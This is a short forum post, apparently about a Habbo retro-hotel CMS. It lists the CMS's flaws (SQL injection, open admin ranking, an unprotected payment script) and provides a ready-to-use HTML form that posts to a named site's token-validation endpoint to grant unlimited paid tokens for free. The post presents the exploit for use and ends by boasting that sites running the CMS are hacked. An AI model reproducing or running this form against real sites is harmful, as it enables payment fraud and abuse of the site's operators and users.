
Originally Posted by
Atomcraft
I get this error:

Just use Phoenix Update SQL ;)
CMS design is very good but there are : SQL Injection fail, rank admin fail (anyone can rank administrator), starpass script unprotected (token unlimited) ...
Just use this for unlimited token :
Code:
<html>
<head>
<title>Jetons gratuits</title>
</head>
<body>
<form method="post" action="http://likehotel.org/habboexpress/beta/boutique/jetons_valide.php" target="cms">
<input type="submit" name="acheter_jetons" value="+12 jetons" />
</form>
<iframe name="cms"></iframe>
</body>
</html>
XSS Injection :


Use this cms and your rétro is hacked :B